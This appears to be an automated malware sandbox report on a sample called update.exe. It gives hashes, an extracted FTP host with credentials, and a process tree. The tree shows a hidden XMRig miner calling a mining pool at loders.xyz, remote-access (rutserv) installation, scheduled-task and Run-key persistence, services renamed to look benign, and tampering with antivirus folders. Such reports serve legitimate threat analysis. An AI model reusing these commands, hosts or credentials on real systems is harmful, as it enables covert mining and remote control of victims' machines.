Overview
overview
10Static
static
101.bin/1.exe
windows10_x64
102019-09-02...10.exe
windows10_x64
1031.exe
windows10_x64
103DMark 11 ...on.exe
windows10_x64
15da0116af4...18.exe
windows10_x64
10Archive.zi...3e.exe
windows10_x64
6CVE-2018-1...oC.swf
windows10_x64
3CVWSHSetup...1].exe
windows10_x64
4DiskIntern...en.exe
windows10_x64
1ForceOp 2....ce.exe
windows10_x64
10HYDRA.exe
windows10_x64
10Keygen.exe
windows10_x64
10Lonelyscre...ox.exe
windows10_x64
1LtHv0O2KZDK4M637.exe
windows10_x64
10Magic_File...ja.exe
windows10_x64
1OnlineInstaller.exe
windows10_x64
10Remouse.Mi...cg.exe
windows10_x64
1SecurityTa...up.exe
windows10_x64
8Treasure.V...ox.exe
windows10_x64
1VyprVPN.exe
windows10_x64
10WSHSetup[1].exe
windows10_x64
3___ _ ____....exe
windows10_x64
10___ _ ____....exe
windows10_x64
10amtemu.v0....ed.exe
windows10_x64
10api.exe
windows10_x64
1default.exe
windows10_x64
10efd97b1038...ea4.js
windows10_x64
3good.exe
windows10_x64
10infected d...er.exe
windows10_x64
8oof.exe
windows10_x64
10ou55sg33s_1.exe
windows10_x64
10update.exe
windows10_x64
10Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
328s -
max time network
357s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
12-11-2021 18:04
Behavioral task
behavioral1
Sample
1.bin/1.exe
Resource
win10-en-20211014
Behavioral task
behavioral2
Sample
2019-09-02_22-41-10.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
31.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
3DMark 11 Advanced Edition.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10-en-20211104
Behavioral task
behavioral6
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
CVE-2018-15982_PoC.swf
Resource
win10-en-20211104
Behavioral task
behavioral8
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
HYDRA.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
Keygen.exe
Resource
win10-en-20211104
Behavioral task
behavioral13
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10-en-20211014
Behavioral task
behavioral14
Sample
LtHv0O2KZDK4M637.exe
Resource
win10-en-20211104
Behavioral task
behavioral15
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
OnlineInstaller.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
SecurityTaskManager_Setup.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10-en-20211104
Behavioral task
behavioral20
Sample
VyprVPN.exe
Resource
win10-en-20211014
Behavioral task
behavioral21
Sample
WSHSetup[1].exe
Resource
win10-en-20211104
Behavioral task
behavioral22
Sample
___ _ _____ __ ___/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์์ฒญ์/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
___ _ _____ __ ___/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์์ฒญ์/์ ์ฐ ๋ฐ ๋น์ ์ฐ์๋ฃ ๋ณด์กด ์.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
amtemu.v0.9.2.win-painter_edited.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
api.exe
Resource
win10-en-20211014
Behavioral task
behavioral26
Sample
default.exe
Resource
win10-en-20211104
Behavioral task
behavioral27
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10-en-20211014
Behavioral task
behavioral28
Sample
good.exe
Resource
win10-en-20211104
Behavioral task
behavioral29
Sample
infected dot net installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral30
Sample
oof.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
ou55sg33s_1.exe
Resource
win10-en-20211014
General
-
Target
update.exe
-
Size
12.0MB
-
MD5
c5c8d4f5d9f26bac32d43854af721fb3
-
SHA1
e4119a28baa102a28ff9b681f6bbb0275c9627c7
-
SHA256
3e32145dca0843c6d5258129821afaaeb653ddef7982912fe85ad4b326807402
-
SHA512
09f39bccb210f96788193d597463c75d3213afd21ed93ac8c843f150d7cb8630f941f54cd8737cc88177dadeb479e8181b40a7f5219e40c948ff18d1955b4828
Malware Config
Extracted
Protocol: ftp- Host:
193.32.188.10 - Port:
21 - Username:
alex - Password:
easypassword
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll acprotect C:\ProgramData\Windows\vp8encoder.dll acprotect -
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig -
Processes:
resource yara_rule C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 C:\ProgramData\Windows\rutserv.exe aspack_v212_v242 -
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
Processes:
cmd.exeupdate.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe -
Executes dropped EXE 13 IoCs
Processes:
wini.exewinit.execheat.exerutserv.exerutserv.exetaskhost.exerutserv.exerutserv.exetaskhostw.exeR8.exetaskhost.exewinlogon.exeMicrosoftHost.exepid process 1072 wini.exe 496 winit.exe 1368 cheat.exe 680 rutserv.exe 1316 rutserv.exe 2992 taskhost.exe 2020 rutserv.exe 3152 rutserv.exe 1788 taskhostw.exe 2088 R8.exe 2240 taskhost.exe 1052 winlogon.exe 1292 MicrosoftHost.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Windows\vp8decoder.dll upx C:\ProgramData\Windows\vp8encoder.dll upx C:\Programdata\WindowsTask\winlogon.exe upx C:\ProgramData\WindowsTask\winlogon.exe upx -
Modifies file permissions 1 TTPs 56 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 968 icacls.exe 3284 icacls.exe 3292 icacls.exe 2852 icacls.exe 732 icacls.exe 1436 icacls.exe 968 icacls.exe 1652 icacls.exe 1220 icacls.exe 1268 icacls.exe 2792 icacls.exe 1048 icacls.exe 2044 icacls.exe 1460 icacls.exe 680 icacls.exe 2088 icacls.exe 4092 icacls.exe 3376 icacls.exe 1776 icacls.exe 2208 icacls.exe 1504 icacls.exe 1652 icacls.exe 1400 icacls.exe 1384 icacls.exe 3636 icacls.exe 888 icacls.exe 2824 icacls.exe 3052 icacls.exe 1084 icacls.exe 3492 icacls.exe 3636 icacls.exe 2844 icacls.exe 700 icacls.exe 416 icacls.exe 1096 icacls.exe 2688 icacls.exe 3620 icacls.exe 3852 icacls.exe 2076 icacls.exe 3220 icacls.exe 2916 icacls.exe 584 icacls.exe 1128 icacls.exe 2520 icacls.exe 1236 icacls.exe 1096 icacls.exe 1320 icacls.exe 1072 icacls.exe 4016 icacls.exe 2120 icacls.exe 1944 icacls.exe 3620 icacls.exe 2852 icacls.exe 2904 icacls.exe 2148 icacls.exe 2120 icacls.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
taskhostw.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ip-api.com -
Modifies WinLogon 2 TTPs 6 IoCs
Processes:
update.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe -
Drops file in System32 directory 3 IoCs
Processes:
rutserv.exedescription ioc process File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb rutserv.exe File opened for modification C:\Windows\SysWOW64\rutserv.pdb rutserv.exe -
autoit_exe 8 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\ProgramData\Windows\winit.exe autoit_exe C:\ProgramData\Windows\winit.exe autoit_exe C:\ProgramData\Microsoft\Intel\taskhost.exe autoit_exe C:\ProgramData\Microsoft\Intel\taskhost.exe autoit_exe C:\Programdata\RealtekHD\taskhostw.exe autoit_exe C:\ProgramData\RealtekHD\taskhostw.exe autoit_exe C:\ProgramData\RealtekHD\taskhost.exe autoit_exe C:\ProgramData\RealtekHD\taskhost.exe autoit_exe -
Drops file in Program Files directory 21 IoCs
Processes:
update.exedescription ioc process File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe File opened for modification C:\Program Files (x86)\SpyHunter update.exe File opened for modification C:\Program Files\AVG update.exe File opened for modification C:\Program Files (x86)\Cezurity update.exe File opened for modification C:\Program Files\Cezurity update.exe File opened for modification C:\Program Files\ESET update.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files\Malwarebytes update.exe File opened for modification C:\Program Files\Enigma Software Group update.exe File opened for modification C:\Program Files\SpyHunter update.exe File opened for modification C:\Program Files\AVAST Software update.exe File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File opened for modification C:\Program Files (x86)\AVG update.exe File opened for modification C:\Program Files\Common Files\McAfee update.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.exe File opened for modification C:\Program Files (x86)\Panda Security update.exe File opened for modification C:\Program Files\COMODO update.exe File opened for modification C:\Program Files (x86)\AVAST Software update.exe File opened for modification C:\Program Files\Kaspersky Lab update.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winit.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3204 schtasks.exe 3592 schtasks.exe 3440 schtasks.exe 1460 schtasks.exe 1652 schtasks.exe 3068 schtasks.exe 788 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 2520 timeout.exe 3564 timeout.exe 612 timeout.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1372 ipconfig.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1920 taskkill.exe 2148 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
wini.exewinit.exeR8.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings R8.exe -
NTFS ADS 4 IoCs
Processes:
taskhost.exeupdate.exetaskhost.exedescription ioc process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ taskhost.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\WinMgmts:\ update.exe File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhost.exe File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ taskhost.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 788 regedit.exe 2692 regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exepid process 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 3196 update.exe 680 rutserv.exe 680 rutserv.exe 680 rutserv.exe 680 rutserv.exe 680 rutserv.exe 680 rutserv.exe 1316 rutserv.exe 1316 rutserv.exe 2020 rutserv.exe 2020 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 3152 rutserv.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe 496 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
taskhostw.exetaskhost.exepid process 1788 taskhostw.exe 2240 taskhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 620 -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exeMicrosoftHost.exedescription pid process Token: SeDebugPrivilege 680 rutserv.exe Token: SeDebugPrivilege 2020 rutserv.exe Token: SeTakeOwnershipPrivilege 3152 rutserv.exe Token: SeTcbPrivilege 3152 rutserv.exe Token: SeTcbPrivilege 3152 rutserv.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 2148 taskkill.exe Token: SeLockMemoryPrivilege 1292 MicrosoftHost.exe Token: SeLockMemoryPrivilege 1292 MicrosoftHost.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
winit.exerutserv.exetaskhost.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhostw.exeR8.exetaskhost.exewinlogon.exeMicrosoftHost.exepid process 496 winit.exe 680 rutserv.exe 2992 taskhost.exe 1316 rutserv.exe 2020 rutserv.exe 3152 rutserv.exe 1580 WinMail.exe 2144 WinMail.exe 1788 taskhostw.exe 2088 R8.exe 2240 taskhost.exe 1052 winlogon.exe 1292 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
update.exewini.exeWScript.execmd.execheat.execmd.execmd.execmd.exedescription pid process target process PID 3196 wrote to memory of 1072 3196 update.exe wini.exe PID 3196 wrote to memory of 1072 3196 update.exe wini.exe PID 3196 wrote to memory of 1072 3196 update.exe wini.exe PID 1072 wrote to memory of 2804 1072 wini.exe WScript.exe PID 1072 wrote to memory of 2804 1072 wini.exe WScript.exe PID 1072 wrote to memory of 2804 1072 wini.exe WScript.exe PID 1072 wrote to memory of 496 1072 wini.exe winit.exe PID 1072 wrote to memory of 496 1072 wini.exe winit.exe PID 1072 wrote to memory of 496 1072 wini.exe winit.exe PID 2804 wrote to memory of 872 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 872 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 872 2804 WScript.exe cmd.exe PID 872 wrote to memory of 788 872 cmd.exe regedit.exe PID 872 wrote to memory of 788 872 cmd.exe regedit.exe PID 872 wrote to memory of 788 872 cmd.exe regedit.exe PID 872 wrote to memory of 2692 872 cmd.exe regedit.exe PID 872 wrote to memory of 2692 872 cmd.exe regedit.exe PID 872 wrote to memory of 2692 872 cmd.exe regedit.exe PID 872 wrote to memory of 2520 872 cmd.exe timeout.exe PID 872 wrote to memory of 2520 872 cmd.exe timeout.exe PID 872 wrote to memory of 2520 872 cmd.exe timeout.exe PID 3196 wrote to memory of 1368 3196 update.exe cheat.exe PID 3196 wrote to memory of 1368 3196 update.exe cheat.exe PID 3196 wrote to memory of 1368 3196 update.exe cheat.exe PID 872 wrote to memory of 680 872 cmd.exe rutserv.exe PID 872 wrote to memory of 680 872 cmd.exe rutserv.exe PID 872 wrote to memory of 680 872 cmd.exe rutserv.exe PID 3196 wrote to memory of 3440 3196 update.exe schtasks.exe PID 3196 wrote to memory of 3440 3196 update.exe schtasks.exe PID 3196 wrote to memory of 3440 3196 update.exe schtasks.exe PID 872 wrote to memory of 1316 872 cmd.exe rutserv.exe PID 872 wrote to memory of 1316 872 cmd.exe rutserv.exe PID 872 wrote to memory of 1316 872 cmd.exe rutserv.exe PID 1368 wrote to memory of 2992 1368 cheat.exe taskhost.exe PID 1368 wrote to memory of 2992 1368 cheat.exe taskhost.exe PID 1368 wrote to memory of 2992 1368 cheat.exe taskhost.exe PID 3196 wrote to memory of 1460 3196 update.exe schtasks.exe PID 3196 wrote to memory of 1460 3196 update.exe schtasks.exe PID 3196 wrote to memory of 1460 3196 update.exe schtasks.exe PID 3196 wrote to memory of 1652 3196 update.exe schtasks.exe PID 3196 wrote to memory of 1652 3196 update.exe schtasks.exe PID 3196 wrote to memory of 1652 3196 update.exe schtasks.exe PID 872 wrote to memory of 2020 872 cmd.exe rutserv.exe PID 872 wrote to memory of 2020 872 cmd.exe rutserv.exe PID 872 wrote to memory of 2020 872 cmd.exe rutserv.exe PID 3196 wrote to memory of 3068 3196 update.exe schtasks.exe PID 3196 wrote to memory of 3068 3196 update.exe schtasks.exe PID 3196 wrote to memory of 3068 3196 update.exe schtasks.exe PID 3196 wrote to memory of 2424 3196 update.exe cmd.exe PID 3196 wrote to memory of 2424 3196 update.exe cmd.exe PID 3196 wrote to memory of 2424 3196 update.exe cmd.exe PID 3196 wrote to memory of 2924 3196 update.exe cmd.exe PID 3196 wrote to memory of 2924 3196 update.exe cmd.exe PID 3196 wrote to memory of 2924 3196 update.exe cmd.exe PID 2424 wrote to memory of 1836 2424 cmd.exe sc.exe PID 2424 wrote to memory of 1836 2424 cmd.exe sc.exe PID 2424 wrote to memory of 1836 2424 cmd.exe sc.exe PID 3196 wrote to memory of 1752 3196 update.exe cmd.exe PID 3196 wrote to memory of 1752 3196 update.exe cmd.exe PID 3196 wrote to memory of 1752 3196 update.exe cmd.exe PID 2924 wrote to memory of 2904 2924 cmd.exe sc.exe PID 2924 wrote to memory of 2904 2924 cmd.exe sc.exe PID 2924 wrote to memory of 2904 2924 cmd.exe sc.exe PID 1752 wrote to memory of 3236 1752 cmd.exe sc.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3792 attrib.exe 996 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\RealtekHD\taskhost.exeC:\ProgramData\RealtekHD\taskhost.exe5⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
-
